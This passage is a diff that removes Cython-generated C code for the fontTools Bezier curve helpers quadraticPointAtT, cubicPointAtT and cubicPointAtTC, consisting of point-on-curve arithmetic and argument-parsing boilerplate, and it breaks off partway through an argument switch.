__PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_4); 
__pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t, __pyx_v_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt3, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1057, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1058 - * x = (1 - t) * (1 - t) * pt1[0] + 2 * (1 - t) * t * pt2[0] + t * t * pt3[0] - * y = (1 - t) * (1 - t) * pt1[1] + 2 * (1 - t) * t * pt2[1] + t * t * pt3[1] - * return (x, y) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1058, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x)) __PYX_ERR(0, 1058, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y)) __PYX_ERR(0, 1058, __pyx_L1_error); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("fontTools.misc.bezierTools.quadraticPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_y); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_63cubicPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_62cubicPointAtT, "cubicPointAtT(pt1, pt2, pt3, pt4, t)\nFinds the point at time `t` on a cubic curve.\n\n Args:\n pt1, pt2, pt3, pt4: Coordinates of the curve as 2D tuples.\n t: The time along the curve.\n\n Returns:\n A 2D tuple with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_63cubicPointAtT = {"cubicPointAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_63cubicPointAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_62cubicPointAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_63cubicPointAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_t = 0; - #if !CYTHON_METH_FASTCALL - 
CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("cubicPointAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 1); __PYX_ERR(0, 1061, 
__pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 2); __PYX_ERR(0, 1061, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 3); __PYX_ERR(0, 1061, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_t)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1061, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 4); __PYX_ERR(0, 1061, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "cubicPointAtT") < 0)) __PYX_ERR(0, 1061, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 5)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - __pyx_v_t = values[4]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("cubicPointAtT", 1, 5, 5, 
__pyx_nargs); __PYX_ERR(0, 1061, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_62cubicPointAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_t); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_62cubicPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_t) { - PyObject *__pyx_v_t2 = NULL; - PyObject *__pyx_v__1_t = NULL; - PyObject *__pyx_v__1_t_2 = NULL; - PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_y = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("cubicPointAtT", 1); - - /* "fontTools/misc/bezierTools.py":1071 - * A 2D tuple with the coordinates of the point. 
- * """ - * t2 = t * t # <<<<<<<<<<<<<< - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_t, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1071, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_t2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1072 - * """ - * t2 = t * t - * _1_t = 1 - t # <<<<<<<<<<<<<< - * _1_t_2 = _1_t * _1_t - * x = ( - */ - __pyx_t_1 = __Pyx_PyInt_SubtractCObj(__pyx_int_1, __pyx_v_t, 1, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1072, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v__1_t = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1073 - * t2 = t * t - * _1_t = 1 - t - * _1_t_2 = _1_t * _1_t # <<<<<<<<<<<<<< - * x = ( - * _1_t_2 * _1_t * pt1[0] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v__1_t, __pyx_v__1_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1073, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v__1_t_2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1075 - * _1_t_2 = _1_t * _1_t - * x = ( - * _1_t_2 * _1_t * pt1[0] # <<<<<<<<<<<<<< - * + 3 * (_1_t_2 * t * pt2[0] + _1_t * t2 * pt3[0]) - * + t2 * t * pt4[0] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v__1_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1075, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1075, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1075, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1076 - * x = ( - * _1_t_2 * _1_t * pt1[0] - * + 3 * (_1_t_2 * t * pt2[0] + _1_t * t2 * pt3[0]) # <<<<<<<<<<<<<< - * + t2 * t * pt4[0] - * ) - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v_t); if 
(unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_pt2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_v__1_t, __pyx_v_t2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt3, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_t_2, 3, 0, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1076, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1077 - * _1_t_2 * _1_t * pt1[0] - * + 3 * (_1_t_2 * t * pt2[0] + _1_t * t2 * pt3[0]) - * + t2 * t * pt4[0] # <<<<<<<<<<<<<< - * ) - * y = ( - */ - __pyx_t_5 = PyNumber_Multiply(__pyx_v_t2, __pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1077, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt4, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1077, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_5, __pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1077, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_2, __pyx_t_4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1077, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_v_x = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1080 - * ) - * y = ( - * _1_t_2 * _1_t * pt1[1] # <<<<<<<<<<<<<< - * + 3 * (_1_t_2 * t * pt2[1] + _1_t * t2 * pt3[1]) - * + t2 * t * pt4[1] - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v__1_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1080, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_pt1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1080, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1080, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1081 - * y = ( - * _1_t_2 * _1_t * pt1[1] - * + 3 * (_1_t_2 * t * pt2[1] + _1_t * t2 * pt3[1]) # <<<<<<<<<<<<<< - * + t2 * t * pt4[1] - * ) - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v__1_t_2, __pyx_v_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_pt2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PyNumber_Multiply(__pyx_t_4, __pyx_t_3); if 
(unlikely(!__pyx_t_5)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v__1_t, __pyx_v_t2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_pt3, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_3, __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_5, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyInt_MultiplyCObj(__pyx_int_3, __pyx_t_4, 3, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1081, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1082 - * _1_t_2 * _1_t * pt1[1] - * + 3 * (_1_t_2 * t * pt2[1] + _1_t * t2 * pt3[1]) - * + t2 * t * pt4[1] # <<<<<<<<<<<<<< - * ) - * return (x, y) - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_t2, __pyx_v_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1082, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_pt4, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1082, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1082, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1082, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_v_y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1084 - * + t2 * t * pt4[1] - * ) - * return (x, y) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1084, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x)) __PYX_ERR(0, 1084, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y)) __PYX_ERR(0, 1084, __pyx_L1_error); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.cubicPointAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_t2); - __Pyx_XDECREF(__pyx_v__1_t); - __Pyx_XDECREF(__pyx_v__1_t_2); - __Pyx_XDECREF(__pyx_v_x); - __Pyx_XDECREF(__pyx_v_y); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_65cubicPointAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_64cubicPointAtTC, "cubicPointAtTC(double complex pt1, double complex pt2, double complex pt3, double complex pt4, double t)\nFinds the point at time `t` on a cubic curve.\n\n Args:\n pt1, pt2, pt3, pt4: Coordinates of the curve as complex numbers.\n t: The time along the curve.\n\n Returns:\n A complex number with the coordinates of the point.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_65cubicPointAtTC = {"cubicPointAtTC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_65cubicPointAtTC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_64cubicPointAtTC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_65cubicPointAtTC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - 
__pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - double __pyx_v_t; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[5] = {0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("cubicPointAtTC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_t,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = 